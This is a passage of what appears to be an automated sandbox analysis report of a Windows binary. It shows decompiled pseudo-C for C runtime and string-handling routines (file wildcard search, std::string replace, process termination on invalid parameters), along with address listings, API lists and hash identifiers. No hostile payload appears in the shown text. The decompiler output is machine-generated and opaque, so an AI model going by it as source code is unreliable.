                    							__eflags = _t198 - _t150;
                    							if(_t198 == _t150) {
                    								L23:
                    								_t199 = 0;
                    								__eflags = 0;
                    								 *_a8 = _t210;
                    								goto L24;
                    							} else {
                    								_t93 = _t210 - _t198;
                    								__eflags = _t93;
                    								_v24 = _t93;
                    								do {
                    									_t162 =  *_t198;
                    									_v12 = _t162 + 1;
                    									do {
                    										_t95 =  *_t162;
                    										_t162 = _t162 + 1;
                    										__eflags = _t95;
                    									} while (_t95 != 0);
                    									_t163 = _t162 - _v12;
                    									_t35 = _t163 + 1; // 0x1
                    									_t96 = _t35;
                    									_push(_t96);
                    									_v12 = _t96;
                    									_t100 = E01411431(_t163, _t191, _v20 - _t191 + _v8,  *_t198);
                    									_t224 = _t224 + 0x10;
                    									__eflags = _t100;
                    									if(_t100 != 0) {
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										E013FDA8E();
                    										asm("int3");
                    										_t220 = _t224;
                    										_push(_t163);
                    										_t164 = _v64;
                    										_t47 = _t164 + 1; // 0x1
                    										_t192 = _t47;
                    										do {
                    											_t103 =  *_t164;
                    											_t164 = _t164 + 1;
                    											__eflags = _t103;
                    										} while (_t103 != 0);
                    										_push(_t198);
                    										_t201 = _a8;
                    										_t166 = _t164 - _t192 + 1;
                    										_v12 = _t166;
                    										__eflags = _t166 - (_t103 | 0xffffffff) - _t201;
                    										if(_t166 <= (_t103 | 0xffffffff) - _t201) {
                    											_push(_t150);
                    											_t50 = _t201 + 1; // 0x1
                    											_t153 = _t50 + _t166;
                    											_t212 = E014009B2(_t166, _t153, 1);
                    											_t168 = _t210;
                    											__eflags = _t201;
                    											if(_t201 == 0) {
                    												L34:
                    												_push(_v12);
                    												_t153 = _t153 - _t201;
                    												_t108 = E01411431(_t168, _t212 + _t201, _t153, _v0);
                    												_t225 = _t224 + 0x10;
                    												__eflags = _t108;
                    												if(__eflags != 0) {
                    													goto L37;
                    												} else {
                    													_t136 = E0140CB55(_a12, __eflags, _t212);
                    													E014012E1(0);
                    													_t138 = _t136;
                    													goto L36;
                    												}
                    											} else {
                    												_push(_t201);
                    												_t139 = E01411431(_t168, _t212, _t153, _a4);
                    												_t225 = _t224 + 0x10;
                    												__eflags = _t139;
                    												if(_t139 != 0) {
                    													L37:
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													_push(0);
                    													E013FDA8E();
                    													asm("int3");
                    													_push(_t220);
                    													_t221 = _t225;
                    													_t226 = _t225 - 0x150;
                    													_t111 =  *0x1435234; // 0x78d9f939
                    													_v116 = _t111 ^ _t221;
                    													_t169 = _v100;
                    													_push(_t153);
                    													_t154 = _v104;
                    													_push(_t212);
                    													_t213 = _v96;
                    													_push(_t201);
                    													_v440 = _t213;
                    													while(1) {
                    														__eflags = _t169 - _t154;
                    														if(_t169 == _t154) {
                    															break;
                    														}
                    														_t113 =  *_t169;
                    														__eflags = _t113 - 0x2f;
                    														if(_t113 != 0x2f) {
                    															__eflags = _t113 - 0x5c;
                    															if(_t113 != 0x5c) {
                    																__eflags = _t113 - 0x3a;
                    																if(_t113 != 0x3a) {
                    																	_t169 = E01414060(_t154, _t169);
                    																	continue;
                    																}
                    															}
                    														}
                    														break;
                    													}
                    													_t193 =  *_t169;
                    													__eflags = _t193 - 0x3a;
                    													if(_t193 != 0x3a) {
                    														L47:
                    														_t202 = 0;
                    														__eflags = _t193 - 0x2f;
                    														if(_t193 == 0x2f) {
                    															L51:
                    															_t115 = 1;
                    															__eflags = 1;
                    														} else {
                    															__eflags = _t193 - 0x5c;
                    															if(_t193 == 0x5c) {
                    																goto L51;
                    															} else {
                    																__eflags = _t193 - 0x3a;
                    																if(_t193 == 0x3a) {
                    																	goto L51;
                    																} else {
                    																	_t115 = 0;
                    																}
                    															}
                    														}
                    														asm("sbb eax, eax");
                    														_v344 =  ~(_t115 & 0x000000ff) & _t169 - _t154 + 0x00000001;
                    														E013F5890(_t202,  &_v336, _t202, 0x140);
                    														_t227 = _t226 + 0xc;
                    														_t214 = FindFirstFileExA(_t154, _t202,  &_v336, _t202, _t202, _t202);
                    														_t123 = _v340;
                    														__eflags = _t214 - 0xffffffff;
                    														if(_t214 != 0xffffffff) {
                    															_t173 =  *((intOrPtr*)(_t123 + 4)) -  *_t123;
                    															__eflags = _t173;
                    															_v348 = _t173 >> 2;
                    															do {
                    																__eflags = _v336.cFileName - 0x2e;
                    																if(_v336.cFileName != 0x2e) {
                    																	L64:
                    																	_push(_t123);
                    																	_push(_v344);
                    																	_t123 =  &(_v336.cFileName);
                    																	_push(_t154);
                    																	_push(_t123);
                    																	L28();
                    																	_t227 = _t227 + 0x10;
                    																	__eflags = _t123;
                    																	if(_t123 != 0) {
                    																		goto L54;
                    																	} else {
                    																		goto L65;
                    																	}
                    																} else {
                    																	_t177 = _v291;
                    																	__eflags = _t177;
                    																	if(_t177 == 0) {
                    																		goto L65;
                    																	} else {
                    																		__eflags = _t177 - 0x2e;
                    																		if(_t177 != 0x2e) {
                    																			goto L64;
                    																		} else {
                    																			__eflags = _v290;
                    																			if(_v290 == 0) {
                    																				goto L65;
                    																			} else {
                    																				goto L64;
                    																			}
                    																		}
                    																	}
                    																}
                    																goto L58;
                    																L65:
                    																_t128 = FindNextFileA(_t214,  &_v336);
                    																__eflags = _t128;
                    																_t123 = _v340;
                    															} while (_t128 != 0);
                    															_t194 =  *_t123;
                    															_t178 = _v348;
                    															_t131 =  *((intOrPtr*)(_t123 + 4)) -  *_t123 >> 2;
                    															__eflags = _t178 - _t131;
                    															if(_t178 != _t131) {
                    																E01413C80(_t194 + _t178 * 4, _t131 - _t178, 4, E0140C76E);
                    															}
                    														} else {
                    															_push(_t123);
                    															_push(_t202);
                    															_push(_t202);
                    															_push(_t154);
                    															L28();
                    															L54:
                    															_t202 = _t123;
                    														}
                    														__eflags = _t214 - 0xffffffff;
                    														if(_t214 != 0xffffffff) {
                    															FindClose(_t214);
                    														}
                    														_t124 = _t202;
                    													} else {
                    														_t124 =  &(_t154[1]);
                    														__eflags = _t169 -  &(_t154[1]);
                    														if(_t169 ==  &(_t154[1])) {
                    															goto L47;
                    														} else {
                    															_push(_t213);
                    															_push(0);
                    															_push(0);
                    															_push(_t154);
                    															L28();
                    														}
                    													}
                    													L58:
                    													__eflags = _v16 ^ _t221;
                    													return E013F268B(_t124, _v16 ^ _t221);
                    												} else {
                    													goto L34;
                    												}
                    											}
                    										} else {
                    											_t138 = 0xc;
                    											L36:
                    											return _t138;
                    										}
                    									} else {
                    										goto L22;
                    									}
                    									goto L68;
                    									L22:
                    									_t195 = _v16;
                    									 *((intOrPtr*)(_v24 + _t198)) = _t195;
                    									_t198 = _t198 + 4;
                    									_t191 = _t195 + _v12;
                    									_v16 = _t195 + _v12;
                    									__eflags = _t198 - _t150;
                    								} while (_t198 != _t150);
                    								goto L23;
                    							}
                    						} else {
                    							_t199 = _t198 | 0xffffffff;
                    							L24:
                    							E014012E1(0);
                    							goto L25;
                    						}
                    					} else {
                    						while(1) {
                    							_v8 = 0x3f2a;
                    							_v6 = _t159;
                    							_t146 = E01414020( *_t207,  &_v8);
                    							__eflags = _t146;
                    							if(_t146 != 0) {
                    								_push( &_v36);
                    								_push(_t146);
                    								_push( *_t207);
                    								L38();
                    								_t223 = _t223 + 0xc;
                    							} else {
                    								_t146 =  &_v36;
                    								_push(_t146);
                    								_push(0);
                    								_push(0);
                    								_push( *_t207);
                    								L28();
                    								_t223 = _t223 + 0x10;
                    							}
                    							_t199 = _t146;
                    							__eflags = _t199;
                    							if(_t199 != 0) {
                    								break;
                    							}
                    							_t207 = _t207 + 4;
                    							_t159 = 0;
                    							__eflags =  *_t207;
                    							if( *_t207 != 0) {
                    								continue;
                    							} else {
                    								_t150 = _v336.cAlternateFileName;
                    								_t198 = _v36;
                    								goto L9;
                    							}
                    							goto L68;
                    						}
                    						L25:
                    						E0140CB30( &_v36);
                    						_t91 = _t199;
                    						goto L26;
                    					}
                    				} else {
                    					_t147 = E013FDB3A();
                    					_t218 = 0x16;
                    					 *_t147 = _t218;
                    					E013FDA61();
                    					_t91 = _t218;
                    					L26:
                    					return _t91;
                    				}
                    				L68:
                    			}























































































                    0x0140c78b
                    0x0140c78e
                    0x0140c794
                    0x0140c7ac
                    0x0140c7af
                    0x0140c7b3
                    0x0140c7b5
                    0x0140c7b7
                    0x0140c7b9
                    0x0140c7bc
                    0x0140c7bf
                    0x0140c7c2
                    0x0140c7c4
                    0x0140c81c
                    0x0140c81c
                    0x0140c822
                    0x0140c824
                    0x0140c82f
                    0x0140c833
                    0x0140c835
                    0x0140c838
                    0x0140c83c
                    0x0140c83c
                    0x0140c83e
                    0x0140c840
                    0x0140c842
                    0x0140c844
                    0x0140c844
                    0x0140c846
                    0x0140c849
                    0x0140c84c
                    0x0140c84c
                    0x0140c84e
                    0x0140c84f
                    0x0140c84f
                    0x0140c85a
                    0x0140c85c
                    0x0140c85f
                    0x0140c860
                    0x0140c863
                    0x0140c863
                    0x0140c867
                    0x0140c86a
                    0x0140c86d
                    0x0140c86d
                    0x0140c87b
                    0x0140c87d
                    0x0140c880
                    0x0140c882
                    0x0140c88c
                    0x0140c88f
                    0x0140c892
                    0x0140c894
                    0x0140c897
                    0x0140c899
                    0x0140c8e9
                    0x0140c8ec
                    0x0140c8ec
                    0x0140c8ee
                    0x00000000
                    0x0140c89b
                    0x0140c89d
                    0x0140c89d
                    0x0140c89f
                    0x0140c8a2
                    0x0140c8a2
                    0x0140c8a7
                    0x0140c8aa
                    0x0140c8aa
                    0x0140c8ac
                    0x0140c8ad
                    0x0140c8ad
                    0x0140c8b1
                    0x0140c8b4
                    0x0140c8b4
                    0x0140c8b7
                    0x0140c8ba
                    0x0140c8c7
                    0x0140c8cc
                    0x0140c8cf
                    0x0140c8d1
                    0x0140c90b
                    0x0140c90c
                    0x0140c90d
                    0x0140c90e
                    0x0140c90f
                    0x0140c910
                    0x0140c915
                    0x0140c919
                    0x0140c91b
                    0x0140c91c
                    0x0140c91f
                    0x0140c91f
                    0x0140c922
                    0x0140c922
                    0x0140c924
                    0x0140c925
                    0x0140c925
                    0x0140c92e
                    0x0140c92f
                    0x0140c932
                    0x0140c935
                    0x0140c938
                    0x0140c93a
                    0x0140c941
                    0x0140c943
                    0x0140c946
                    0x0140c950
                    0x0140c953
                    0x0140c954
                    0x0140c956
                    0x0140c96a
                    0x0140c96a
                    0x0140c96d
                    0x0140c977
                    0x0140c97c
                    0x0140c97f
                    0x0140c981
                    0x00000000
                    0x0140c983
                    0x0140c987
                    0x0140c990
                    0x0140c996
                    0x00000000
                    0x0140c999
                    0x0140c958
                    0x0140c958
                    0x0140c95e
                    0x0140c963
                    0x0140c966
                    0x0140c968
                    0x0140c99f
                    0x0140c9a1
                    0x0140c9a2
                    0x0140c9a3
                    0x0140c9a4
                    0x0140c9a5
                    0x0140c9a6
                    0x0140c9ab
                    0x0140c9ae
                    0x0140c9af
                    0x0140c9b1
                    0x0140c9b7
                    0x0140c9be
                    0x0140c9c1
                    0x0140c9c4
                    0x0140c9c5
                    0x0140c9c8
                    0x0140c9c9
                    0x0140c9cc
                    0x0140c9cd
                    0x0140c9ee
                    0x0140c9ee
                    0x0140c9f0
                    0x00000000
                    0x00000000
                    0x0140c9d5
                    0x0140c9d7
                    0x0140c9d9
                    0x0140c9db
                    0x0140c9dd
                    0x0140c9df
                    0x0140c9e1
                    0x0140c9ec
                    0x00000000
                    0x0140c9ec
                    0x0140c9e1
                    0x0140c9dd
                    0x00000000
                    0x0140c9d9
                    0x0140c9f2
                    0x0140c9f4
                    0x0140c9f7
                    0x0140ca10
                    0x0140ca10
                    0x0140ca12
                    0x0140ca15
                    0x0140ca25
                    0x0140ca27
                    0x0140ca27
                    0x0140ca17
                    0x0140ca17
                    0x0140ca1a
                    0x00000000
                    0x0140ca1c
                    0x0140ca1c
                    0x0140ca1f
                    0x00000000
                    0x0140ca21
                    0x0140ca21
                    0x0140ca21
                    0x0140ca1f
                    0x0140ca1a
                    0x0140ca35
                    0x0140ca39
                    0x0140ca47
                    0x0140ca4c
                    0x0140ca61
                    0x0140ca63
                    0x0140ca69
                    0x0140ca6c
                    0x0140ca9e
                    0x0140ca9e
                    0x0140caa3
                    0x0140caa9
                    0x0140caa9
                    0x0140cab0
                    0x0140caca
                    0x0140caca
                    0x0140cacb
                    0x0140cad1
                    0x0140cad7
                    0x0140cad8
                    0x0140cad9
                    0x0140cade
                    0x0140cae1
                    0x0140cae3
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140cab2
                    0x0140cab2
                    0x0140cab8
                    0x0140caba
                    0x00000000
                    0x0140cabc
                    0x0140cabc
                    0x0140cabf
                    0x00000000
                    0x0140cac1
                    0x0140cac1
                    0x0140cac8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140cac8
                    0x0140cabf
                    0x0140caba
                    0x00000000
                    0x0140cae5
                    0x0140caed
                    0x0140caf3
                    0x0140caf5
                    0x0140caf5
                    0x0140cafd
                    0x0140cb02
                    0x0140cb0a
                    0x0140cb0d
                    0x0140cb0f
                    0x0140cb23
                    0x0140cb28
                    0x0140ca6e
                    0x0140ca6e
                    0x0140ca6f
                    0x0140ca70
                    0x0140ca71
                    0x0140ca72
                    0x0140ca7a
                    0x0140ca7a
                    0x0140ca7a
                    0x0140ca7c
                    0x0140ca7f
                    0x0140ca82
                    0x0140ca82
                    0x0140ca88
                    0x0140c9f9
                    0x0140c9f9
                    0x0140c9fc
                    0x0140c9fe
                    0x00000000
                    0x0140ca00
                    0x0140ca00
                    0x0140ca03
                    0x0140ca04
                    0x0140ca05
                    0x0140ca06
                    0x0140ca0b
                    0x0140c9fe
                    0x0140ca8a
                    0x0140ca8f
                    0x0140ca9a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140c968
                    0x0140c93c
                    0x0140c93e
                    0x0140c99a
                    0x0140c99e
                    0x0140c99e
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0140c8d3
                    0x0140c8d6
                    0x0140c8d9
                    0x0140c8dc
                    0x0140c8df
                    0x0140c8e2
                    0x0140c8e5
                    0x0140c8e5
                    0x00000000
                    0x0140c8a2
                    0x0140c884
                    0x0140c884
                    0x0140c8f0
                    0x0140c8f2
                    0x00000000
                    0x0140c8f7
                    0x0140c7c6
                    0x0140c7c6
                    0x0140c7c9
                    0x0140c7d2
                    0x0140c7d5
                    0x0140c7dc
                    0x0140c7de
                    0x0140c7f7
                    0x0140c7f8
                    0x0140c7f9
                    0x0140c7fb
                    0x0140c800
                    0x0140c7e0
                    0x0140c7e0
                    0x0140c7e3
                    0x0140c7e4
                    0x0140c7e6
                    0x0140c7e8
                    0x0140c7ea
                    0x0140c7ef
                    0x0140c7ef
                    0x0140c803
                    0x0140c805
                    0x0140c807
                    0x00000000
                    0x00000000
                    0x0140c80d
                    0x0140c810
                    0x0140c812
                    0x0140c814
                    0x00000000
                    0x0140c816
                    0x0140c816
                    0x0140c819
                    0x00000000
                    0x0140c819
                    0x00000000
                    0x0140c814
                    0x0140c8f8
                    0x0140c8fb
                    0x0140c900
                    0x00000000
                    0x0140c903
                    0x0140c796
                    0x0140c796
                    0x0140c79d
                    0x0140c79e
                    0x0140c7a0
                    0x0140c7a5
                    0x0140c904
                    0x0140c908
                    0x0140c908
                    0x00000000

                    APIs
                    • _strpbrk.LIBCMT ref: 0140C7D5
                    • _free.LIBCMT ref: 0140C8F2
                      • Part of subcall function 013FDA8E: IsProcessorFeaturePresent.KERNEL32(00000017,013FDA60,?,?,?,00000008,?,00000016,?,?,013FDA6D,00000000,00000000,00000000,00000000,00000000), ref: 013FDA90
                      • Part of subcall function 013FDA8E: GetCurrentProcess.KERNEL32(C0000417), ref: 013FDAB2
                      • Part of subcall function 013FDA8E: TerminateProcess.KERNEL32(00000000), ref: 013FDAB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                    • String ID: *?$.
                    • API String ID: 2812119850-3972193922
                    • Opcode ID: 4ed1ffbfd5603ec42b2d431e78c02d065da8ae8646705422cae7837eb525ff75
                    • Instruction ID: 7906ee01427550f84dcbc817f563fb3576068c99db79cfbb0cbb732bc5ae1a53
                    • Opcode Fuzzy Hash: 4ed1ffbfd5603ec42b2d431e78c02d065da8ae8646705422cae7837eb525ff75
                    • Instruction Fuzzy Hash: 5051B372D0010ADFDF16CFAAC880AAEBBB5EF58310F2442BED954E7391D6319A018B54
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 71%
                    			E013CD6F0(intOrPtr* __ecx, signed int __edi, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                    				intOrPtr _v4;
                    				void* _v16;
                    				signed int _v20;
                    				void* _v24;
                    				intOrPtr _v28;
                    				char _v36;
                    				signed int _v40;
                    				void* _v48;
                    				void* __ebx;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t46;
                    				void* _t48;
                    				void* _t49;
                    				intOrPtr _t56;
                    				void* _t58;
                    				intOrPtr* _t59;
                    				char* _t70;
                    				intOrPtr* _t74;
                    				intOrPtr* _t77;
                    				intOrPtr _t80;
                    				signed int _t81;
                    				signed int _t90;
                    				signed int _t91;
                    				intOrPtr* _t95;
                    				intOrPtr _t98;
                    				intOrPtr _t100;
                    				void* _t102;
                    				intOrPtr* _t103;
                    				signed int _t104;
                    				void* _t105;
                    				intOrPtr* _t113;
                    				void* _t114;
                    				void* _t121;
                    				signed int _t128;
                    				void* _t129;
                    
                    				_t104 = __edi;
                    				_t80 = _a8;
                    				_t113 = __ecx;
                    				if(_t80 == 0) {
                    					L13:
                    					_t90 =  *(_t113 + 0x10);
                    					_t100 = _a4;
                    					__eflags = _t90 - _t100;
                    					if(__eflags < 0) {
                    						_push("invalid string position");
                    						E013F0FA1(_t104, _t113, __eflags);
                    						goto L41;
                    					} else {
                    						_push(_t121);
                    						_t121 = _a12;
                    						__eflags =  !_t90 - _t121;
                    						if(__eflags <= 0) {
                    							L41:
                    							_push("string too long");
                    							E013F0F81(_t100, _t104, _t113, __eflags);
                    							goto L42;
                    						} else {
                    							_push(_t104);
                    							_t104 = _t121 + _t90;
                    							__eflags = _t121;
                    							if(_t121 == 0) {
                    								L39:
                    								return _t113;
                    							} else {
                    								__eflags = _t104 - 0xfffffffe;
                    								if(__eflags > 0) {
                    									L42:
                    									_push("string too long");
                    									E013F0F81(_t100, _t104, _t113, __eflags);
                    									asm("int3");
                    									asm("int3");
                    									asm("int3");
                    									_push(_t121);
                    									_push(0xffffffff);
                    									_push(E01416930);
                    									_push( *[fs:0x0]);
                    									_t129 = _t128 - 0xc;
                    									_push(_t80);
                    									_push(_t113);
                    									_push(_t104);
                    									_t46 =  *0x1435234; // 0x78d9f939
                    									_push(_t46 ^ _t128);
                    									_t48 =  &_v36;
                    									 *[fs:0x0] = _t48;
                    									_t81 = _t90;
                    									_t91 =  *(_t81 + 8);
                    									_t114 = _v16;
                    									_t105 =  *(_t81 + 0xc);
                    									_v48 = _t105;
                    									_v40 = _t91;
                    									__eflags = _t91 - _t114;
                    									if(_t91 != _t114) {
                    										__eflags = _t114;
                    										if(__eflags != 0) {
                    											_t49 = E013CD9F0(_t91, _t105, __eflags, _t114);
                    											_t91 = _v20;
                    											_t129 = _t129 + 4;
                    										} else {
                    											_t49 = 0;
                    										}
                    										__eflags = _t114 - _t91;
                    										_v24 = _t49;
                    										_t102 =  <  ? _t114 : _t91;
                    										__eflags = _t105;
                    										if(_t105 != 0) {
                    											__eflags = _t49;
                    											if(_t49 != 0) {
                    												E013E7060(_t49, _t102, _t105, _t102);
                    												_t91 = _v20;
                    												_t129 = _t129 + 0x10;
                    											}
                    										}
                    										__eflags = 0;
                    										memset(_t105, 0, _t91 << 0);
                    										_t48 = L013CDA60(_v28);
                    										_t105 = _v24;
                    									}
                    									 *(_t81 + 0xc) = _t105;
                    									 *(_t81 + 8) = _t114;
                    									 *((intOrPtr*)(_t81 + 4)) = 0xffffffff;
                    									 *[fs:0x0] = _v16;
                    									return _t48;
                    								} else {
                    									__eflags =  *((intOrPtr*)(_t113 + 0x14)) - _t104;
                    									if( *((intOrPtr*)(_t113 + 0x14)) >= _t104) {
                    										__eflags = _t104;
                    										if(_t104 != 0) {
                    											goto L19;
                    										} else {
                    											 *(_t113 + 0x10) = _t104;
                    											__eflags =  *((intOrPtr*)(_t113 + 0x14)) - 0x10;
                    											if( *((intOrPtr*)(_t113 + 0x14)) < 0x10) {
                    												_t70 = _t113;
                    												 *_t70 = 0;
                    												return _t70;
                    											} else {
                    												 *((char*)( *_t113)) = 0;
                    												return _t113;
                    											}
                    										}
                    									} else {
                    										_push(_t90);
                    										_push(_t104);
                    										E013C5927(_t80, _t113);
                    										_t100 = _v4;
                    										__eflags = _t104;
                    										if(_t104 == 0) {
                    											goto L39;
                    										} else {
                    											L19:
                    											_t56 =  *((intOrPtr*)(_t113 + 0x14));
                    											__eflags = _t56 - 0x10;
                    											if(_t56 < 0x10) {
                    												_a12 = _t113;
                    											} else {
                    												_a12 =  *_t113;
                    											}
                    											__eflags = _t56 - 0x10;
                    											if(_t56 < 0x10) {
                    												_t95 = _t113;
                    											} else {
                    												_t95 =  *_t113;
                    											}
                    											_t58 =  *(_t113 + 0x10) - _t100;
                    											__eflags = _t58;
                    											if(_t58 != 0) {
                    												__eflags = _t95 + _t100 + _t121;
                    												E013F47C0(_t95 + _t100 + _t121, _a12 + _t100, _t58);
                    												_t100 = _a4;
                    												_t128 = _t128 + 0xc;
                    											}
                    											__eflags =  *((intOrPtr*)(_t113 + 0x14)) - 0x10;
                    											if( *((intOrPtr*)(_t113 + 0x14)) < 0x10) {
                    												_t59 = _t113;
                    											} else {
                    												_t59 =  *_t113;
                    											}
                    											__eflags = _t121;
                    											if(_t121 != 0) {
                    												__eflags = _t59 + _t100;
                    												E013F5310(_t59 + _t100, _t80, _t121);
                    											}
                    											__eflags =  *((intOrPtr*)(_t113 + 0x14)) - 0x10;
                    											 *(_t113 + 0x10) = _t104;
                    											if( *((intOrPtr*)(_t113 + 0x14)) < 0x10) {
                    												 *((char*)(_t113 + _t104)) = 0;
                    												goto L39;
                    											} else {
                    												 *((char*)( *_t113 + _t104)) = 0;
                    												return _t113;
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					_t98 =  *((intOrPtr*)(__ecx + 0x14));
                    					if(_t98 < 0x10) {
                    						_t74 = __ecx;
                    					} else {
                    						_t74 =  *__ecx;
                    					}
                    					if(_t80 < _t74) {
                    						goto L13;
                    					} else {
                    						if(_t98 < 0x10) {
                    							_t103 = _t113;
                    						} else {
                    							_t103 =  *_t113;
                    						}
                    						if( *(_t113 + 0x10) + _t103 <= _t80) {
                    							goto L13;
                    						} else {
                    							if(_t98 < 0x10) {
                    								_t77 = _t113;
                    							} else {
                    								_t77 =  *_t113;
                    							}
                    							_push(_a12);
                    							return E013C6F9C(_t80 - _t77, _t113, _t104, _t113, _a4, _t113, _t80 - _t77);
                    						}
                    					}
                    				}
                    			}







































                    0x013cd6f0
                    0x013cd6f1
                    0x013cd6f6
                    0x013cd6fa
                    0x013cd745
                    0x013cd745
                    0x013cd748
                    0x013cd74c
                    0x013cd74e
                    0x013cd83f
                    0x013cd844
                    0x00000000
                    0x013cd754
                    0x013cd756
                    0x013cd757
                    0x013cd75d
                    0x013cd75f
                    0x013cd849
                    0x013cd849
                    0x013cd84e
                    0x00000000
                    0x013cd765
                    0x013cd765
                    0x013cd766
                    0x013cd769
                    0x013cd76b
                    0x013cd836
                    0x013cd83c
                    0x013cd771
                    0x013cd771
                    0x013cd774
                    0x013cd853
                    0x013cd853
                    0x013cd858
                    0x013cd85d
                    0x013cd85e
                    0x013cd85f
                    0x013cd860
                    0x013cd863
                    0x013cd865
                    0x013cd870
                    0x013cd871
                    0x013cd874
                    0x013cd875
                    0x013cd876
                    0x013cd877
                    0x013cd87e
                    0x013cd87f
                    0x013cd882
                    0x013cd888
                    0x013cd88a
                    0x013cd88d
                    0x013cd890
                    0x013cd893
                    0x013cd896
                    0x013cd899
                    0x013cd89b
                    0x013cd89d
                    0x013cd89f
                    0x013cd8a6
                    0x013cd8ab
                    0x013cd8ae
                    0x013cd8a1
                    0x013cd8a1
                    0x013cd8a1
                    0x013cd8b1
                    0x013cd8b3
                    0x013cd8b8
                    0x013cd8bb
                    0x013cd8bd
                    0x013cd8bf
                    0x013cd8c1
                    0x013cd8c7
                    0x013cd8cc
                    0x013cd8cf
                    0x013cd8cf
                    0x013cd8c1
                    0x013cd8d5
                    0x013cd8d7
                    0x013cd8d9
                    0x013cd8de
                    0x013cd8e1
                    0x013cd8e4
                    0x013cd8e7
                    0x013cd8ea
                    0x013cd8f4
                    0x013cd902
                    0x013cd77a
                    0x013cd77a
                    0x013cd77d
                    0x013cd7a4
                    0x013cd7a6
                    0x00000000
                    0x013cd7a8
                    0x013cd7a8
                    0x013cd7ab
                    0x013cd7af
                    0x013cd7c0
                    0x013cd7c5
                    0x013cd7c8
                    0x013cd7b1
                    0x013cd7b5
                    0x013cd7bc
                    0x013cd7bc
                    0x013cd7af
                    0x013cd77f
                    0x013cd77f
                    0x013cd780
                    0x013cd783
                    0x013cd788
                    0x013cd78c
                    0x013cd78e
                    0x00000000
                    0x013cd794
                    0x013cd794
                    0x013cd794
                    0x013cd797
                    0x013cd79a
                    0x013cd7cb
                    0x013cd79c
                    0x013cd79e
                    0x013cd79e
                    0x013cd7cf
                    0x013cd7d2
                    0x013cd7d8
                    0x013cd7d4
                    0x013cd7d4
                    0x013cd7d4
                    0x013cd7dd
                    0x013cd7dd
                    0x013cd7df
                    0x013cd7ec
                    0x013cd7ef
                    0x013cd7f4
                    0x013cd7f8
                    0x013cd7f8
                    0x013cd7fb
                    0x013cd7ff
                    0x013cd805
                    0x013cd801
                    0x013cd801
                    0x013cd801
                    0x013cd807
                    0x013cd809
                    0x013cd80c
                    0x013cd810
                    0x013cd815
                    0x013cd818
                    0x013cd81c
                    0x013cd81f
                    0x013cd832
                    0x00000000
                    0x013cd821
                    0x013cd823
                    0x013cd82d
                    0x013cd82d
                    0x013cd81f
                    0x013cd78e
                    0x013cd77d
                    0x013cd774
                    0x013cd76b
                    0x013cd75f
                    0x013cd6fc
                    0x013cd6fc
                    0x013cd702
                    0x013cd708
                    0x013cd704
                    0x013cd704
                    0x013cd704
                    0x013cd70c
                    0x00000000
                    0x013cd70e
                    0x013cd711
                    0x013cd717
                    0x013cd713
                    0x013cd713
                    0x013cd713
                    0x013cd720
                    0x00000000
                    0x013cd722
                    0x013cd725
                    0x013cd72b
                    0x013cd727
                    0x013cd727
                    0x013cd727
                    0x013cd72d
                    0x013cd742
                    0x013cd742
                    0x013cd720
                    0x013cd70c

                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp Download File
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: invalid string position$string too long
                    • API String ID: 0-4289949731
                    • Opcode ID: 2aa4162c803dae5b93ee5b3e7725d3b673ddd2e313bc955a981580dabdfa1686
                    • Instruction ID: 2423882537f96d2b4ab00194b02cd77c38db96bf4c3db0d0508994efe2fee07f
                    • Opcode Fuzzy Hash: 2aa4162c803dae5b93ee5b3e7725d3b673ddd2e313bc955a981580dabdfa1686
                    • Instruction Fuzzy Hash: CA41B3353143458BD324DE9CD88092BFBEAEB91E28B24493EF29587A41DB71EC45C7E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 57%
                    			E013CF1A0(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
                    				char _v8;
                    				char _v16;
                    				signed int _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				char _v44;
                    				intOrPtr _v48;
                    				char _v60;
                    				intOrPtr _v64;
                    				char _v68;
                    				char _v84;
                    				intOrPtr _v136;
                    				char _v140;
                    				signed int _v152;
                    				signed int _t41;
                    				signed int _t42;
                    				signed char _t54;
                    				intOrPtr _t59;
                    				intOrPtr _t61;
                    				void* _t62;
                    				intOrPtr* _t65;
                    				char* _t71;
                    				intOrPtr* _t84;
                    				char* _t85;
                    				intOrPtr* _t89;
                    				intOrPtr* _t90;
                    				signed int _t96;
                    
                    				_t94 = _t96;
